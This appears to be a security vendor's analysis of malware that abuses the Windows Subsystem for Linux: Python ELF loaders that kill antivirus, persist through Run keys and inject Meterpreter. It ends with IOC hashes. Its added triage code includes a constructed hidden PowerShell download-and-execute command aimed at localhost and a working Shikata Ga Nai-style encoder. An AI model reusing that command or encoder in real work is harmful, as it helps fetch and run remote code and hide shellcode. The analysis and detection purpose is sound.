What is WSL?
The Windows Subsystem for Linux (WSL) is a compatibility layer in the Windows operating system that lets users run Linux command-line tools and binaries on a Windows machine. WSL ships a launcher called bash.exe, which opens a Linux shell in a console window inside the Windows interface. It can be thought of as a Linux "shell" application that runs on Windows.
A new attack chain is underway in which attackers target the WSL environment. The samples are written in Python 3 and converted into ELF executables for Debian-based Linux with PyInstaller. These files act either as a loader that runs an embedded payload, or as a downloader that retrieves the payload from a remote server and injects it into a running process. This tradecraft can give an actor an unobtrusive foothold on a compromised machine. There are two variants of the ELF loader: the first is written entirely in Python and resolves Windows APIs through ctypes; the second uses Python to launch a PowerShell script that injects the payload and performs further actions on the host. Some samples carry lightweight payloads built with open-source tools such as Meterpreter; others try to download shellcode from a remote C2 server.
Fig. 1: Flow diagram
PowerShell is used to inject and execute the shellcode in some samples, while Python ctypes is used to resolve Windows APIs in others.
In the PowerShell sample, the compiled Python code calls three functions:
- Retro()
- kill_av()
- windowspersistance()
The Retro() function contains the PowerShell payload, which is wrapped in several layers of Base64 encoding. The decoded PowerShell carries an msfvenom-generated payload.
Inside an infinite while True loop, Retro() uses subprocess to execute the Base64-encoded PowerShell script every 20 seconds, so the loop blocks whatever code follows it from running.
The kill_av() function does what its name says: it uses os.popen to try to kill known AV products and analysis tools.
The windowspersistance() function creates a registry Run key for persistence via subprocess, after copying the original ELF file into an AppData subdirectory as payload.exe.
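When triaging a loader like Retro(), the first practical task is to peel the nested Base64 layers off the PowerShell string to see what it actually runs. The helper below is an added example written for this page, not code from the samples or from the researchers; the wrapped one-liner, the layer count (three) and the URL it contains are constructed test data, not the real payload. It keeps stripping Base64 until the content stops being valid Base64, and it normalises the UTF-16LE form that powershell -EncodedCommand uses so that further layers underneath it can still be peeled.

```python
import base64
import binascii
import re

# Constructed sample input for this example: a short PowerShell one-liner
# wrapped in three layers of base64, in the style of the Retro() payload.
# The command text, URL and layer count are assumptions, not the real sample.
INNER_COMMAND = (
    'powershell -nop -w hidden -c '
    '"IEX (New-Object Net.WebClient).DownloadString(\'http://127.0.0.1/stage\')"'
)

def wrap_base64(text: str, layers: int) -> str:
    """Apply `layers` rounds of base64 to build a test blob."""
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()

SAMPLE_MULTILAYER = wrap_base64(INNER_COMMAND, 3)
# powershell -EncodedCommand form: a single base64 layer over UTF-16LE text.
SAMPLE_ENCODED_COMMAND = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()

B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

def looks_utf16le(data: bytes) -> bool:
    """True when every odd byte is NUL, i.e. ASCII text stored as UTF-16LE."""
    return len(data) >= 2 and len(data) % 2 == 0 and all(b == 0 for b in data[1::2])

def peel_base64(blob, max_layers=16):
    """Strip base64 layers until the content is no longer base64.

    Returns (layers_removed, final_text). A UTF-16LE layer (as produced by
    powershell -EncodedCommand) is converted to UTF-8 before continuing, so
    base64 hidden underneath it is still peeled.
    """
    data = blob.encode() if isinstance(blob, str) else blob
    layers = 0
    while layers < max_layers:
        stripped = b"".join(data.split())  # tolerate line-wrapped blobs
        if not stripped or len(stripped) % 4 or not B64_ALPHABET.match(stripped):
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            break
        if looks_utf16le(decoded):
            decoded = decoded.decode("utf-16-le").encode()
        data = decoded
        layers += 1
    return layers, data.decode("utf-8", errors="replace")

if __name__ == "__main__":
    for name, blob in (("multilayer", SAMPLE_MULTILAYER),
                       ("encodedcommand", SAMPLE_ENCODED_COMMAND)):
        count, text = peel_base64(blob)
        print(f"{name}: {count} layer(s) removed -> {text}")
```

The stop condition is deliberately strict (alphabet check, length a multiple of four, strict decoding): a real command line almost always contains spaces, quotes or dashes, so the loop ends on the first layer that is plain text rather than guessing.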
The Meterpreter payload provides an interactive shell from which the attacker can explore the target machine and execute code. Meterpreter is deployed using in-memory DLL injection; as a result it resides entirely in memory and writes nothing to disk.
In this case the Meterpreter payload was injected into the Apache HTTP Server benchmarking tool (ab.exe) using msfvenom.
The figure above shows the Meterpreter payload.
The image above shows that it tries to connect to the C2 server for further interaction, but fails and exits.
Since the IP is no longer active, the sample cannot reach the server, so we were unable to trace any further activity.
According to the static analysis shown in the figure above, after connecting to the server the stager receives a length value, allocates that much memory with VirtualAlloc, and then keeps receiving data in a loop until the remaining byte count reaches zero. It then frees the allocated memory, closes the socket and exits.
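The receive loop described above is the standard reverse_tcp stager handshake: a 4-byte little-endian length, a buffer of that size, then recv() until the count is exhausted. The following is an added example for this page, not the sample's code and not Metasploit's: it emulates both sides of that exchange over a local socketpair, with a constructed byte string standing in for the second stage. Unlike the real shellcode it returns the received bytes instead of executing them, and uses a bytearray where the stager calls VirtualAlloc.

```python
import socket
import struct
import threading

# Constructed stand-in for the second stage (NOT real Meterpreter): 10240
# bytes, deliberately larger than a single recv() so the loop matters.
STAGE = bytes(range(256)) * 40

def handler_send_stage(sock, stage: bytes) -> None:
    """Handler side: 4-byte little-endian length, then the stage bytes."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)
    sock.close()

def stager_receive(sock, chunk: int = 4096) -> bytes:
    """Stager side, mirroring the static analysis: read the length, allocate
    a buffer (VirtualAlloc in the shellcode), then recv() in a loop until the
    remaining count reaches zero."""
    hdr = b""
    while len(hdr) < 4:
        part = sock.recv(4 - len(hdr))
        if not part:
            raise ConnectionError("peer closed before sending the length")
        hdr += part
    total = struct.unpack("<I", hdr)[0]
    buf = bytearray(total)            # the VirtualAlloc equivalent
    view = memoryview(buf)
    remaining = total
    while remaining:
        n = sock.recv_into(view[total - remaining:], min(chunk, remaining))
        if n == 0:
            raise ConnectionError("peer closed mid-stage")
        remaining -= n
    sock.close()
    return bytes(buf)                 # the shellcode would jump here instead

def run_exchange(stage: bytes = STAGE) -> bytes:
    """Run handler and stager over a local socketpair; return what the
    stager assembled."""
    handler_sock, stager_sock = socket.socketpair()
    t = threading.Thread(target=handler_send_stage, args=(handler_sock, stage))
    t.start()
    received = stager_receive(stager_sock)
    t.join()
    return received

if __name__ == "__main__":
    got = run_exchange()
    print(f"stager received {len(got)} bytes, intact={got == STAGE}")
```

For detection purposes the useful property is the fixed shape of the exchange: a tiny connect followed by a 4-byte read and a large inbound transfer into freshly allocated executable memory, which is what the shellcode's VirtualAlloc plus recv loop looks like in a sandbox trace.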
We also found other IOCs that communicate with the same IP address. These samples are Telegram Desktop setup files carrying a Meterpreter payload, and the payload is obfuscated with the Shikata Ga Nai (SGN) encoder.
SGN is a polymorphic XOR additive feedback encoder. With XOR additive feedback, the algorithm XORs each upcoming 32-bit block of the shellcode with the current key and then adds the decoded block to the key, producing the key used for the next block. To decode the shellcode, the same steps are applied in reverse.
The encoder supports multiple iterations. In this case the payload was encoded five times.
After decoding we obtain the final Meterpreter payload, shown below.
The subsequent behaviour of this payload is the same as described above.
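To make the XOR additive feedback rule concrete, here is an added example written for this page (not the sample's code and not Metasploit's encoder). It implements the word-level transform in both directions and chains it five times, as the sample was encoded. Assumptions: the classic decoder ordering (XOR the word with the key, then add the decoded word to the key), 32-bit little-endian words, fixed keys instead of the random ones the real encoder picks, and no decoder stub, which the real encoder prepends on every iteration so that the next iteration also covers the previous stub. The 16-byte "shellcode" is constructed filler, not a Meterpreter payload.

```python
import struct

# Constructed sample "shellcode" (x86 filler: nops, xor eax,eax / inc eax,
# int3s, ret). Not a real Meterpreter payload.
SAMPLE_SHELLCODE = bytes.fromhex("90909090" "31c04040" "cccccccc" "c3909090")

# Five fixed 32-bit keys so the run is reproducible; the real encoder picks a
# fresh random key for every iteration.
KEYS = [0x1D4B6A9F, 0x7A2C3E10, 0x0BADF00D, 0x5F3759DF, 0xC0FFEE00]

MASK32 = 0xFFFFFFFF

def sgn_encode(plain: bytes, key: int) -> bytes:
    """One XOR-additive-feedback pass over 32-bit little-endian words:
    out = word ^ key ; key = (key + word) mod 2**32 (assumed classic order)."""
    plain += b"\x00" * ((-len(plain)) % 4)      # pad to whole words
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", plain):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK32
    return bytes(out)

def sgn_decode(enc: bytes, key: int) -> bytes:
    """Inverse of one pass: XOR recovers the word, and the recovered word
    feeds the key, exactly like the decoder stub's xor/add pair."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", enc):
        plain = word ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)

def sgn_encode_iterations(payload: bytes, keys) -> bytes:
    """Apply one pass per key, in order (five passes with KEYS)."""
    for key in keys:
        payload = sgn_encode(payload, key)
    return payload

def sgn_decode_iterations(payload: bytes, keys) -> bytes:
    """Undo the passes in reverse key order, as the nested stubs would."""
    for key in reversed(keys):
        payload = sgn_decode(payload, key)
    return payload

def recover_key(enc: bytes, known_first_word: bytes) -> int:
    """If the first four plaintext bytes are known (stager prologues are
    predictable), the key of that pass is simply enc[0:4] XOR plain[0:4]."""
    (e,) = struct.unpack("<I", enc[:4])
    (p,) = struct.unpack("<I", known_first_word)
    return e ^ p

if __name__ == "__main__":
    encoded = sgn_encode_iterations(SAMPLE_SHELLCODE, KEYS)
    print("encoded:", encoded.hex())
    print("decoded:", sgn_decode_iterations(encoded, KEYS).hex())
```

The recover_key() helper is why SGN is obfuscation rather than encryption: with a known or guessable first word, each layer's key falls out immediately, and the feedback chain then unrolls the rest of that layer.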
Conclusion
We recommend that users who have enabled WSL ensure proper logging so that attacks of this kind can be detected, as threat actors are beginning to abuse this operating system feature. Quick Heal protects its users by detecting these samples as ELF.Trojan.44270.GC and Trojan.Swrort.
Indicators of Compromise (IOCs):
ELF IoCs (SHA-256):
- 53854c6d163bfd0c56d8b297ac43bd25c21f696de6063031241e792ee65df441 ELF.Trojan.44270.GC
- c297e545b8f150cc5ff56dbb68dc74fe30a421d9d40f38f4a53083192697c44c ELF.Trojan.44270.GC
- 17921368901f23e0cad0d2fe4ce5694aebaf4727699ed0358117500701914d1b ELF.Trojan.44270.GC
- 198a2d42df010d838b4207f478d885ef36e3db13b1744d673e221b828c28bf77 ELF.Trojan.44270.GC
PE IoCs (MD5):
- 85acfee86fd742ac5b6e347cd860324b Trojan.Swrort.S23689749
- F15ef7b1c22aa23fa5de99980501b2dc Trojan.Swrort.S23689749
- C21e299905613e5cd5d79432934e47e3 Trojan.Swrort.S23689749
- Ae094056a41854ab04409c6f791194df Trojan.Swrort.A
Subject matter experts:
- Rahul Pawar, Security Researcher I
- Rutuja Means, Security Researcher I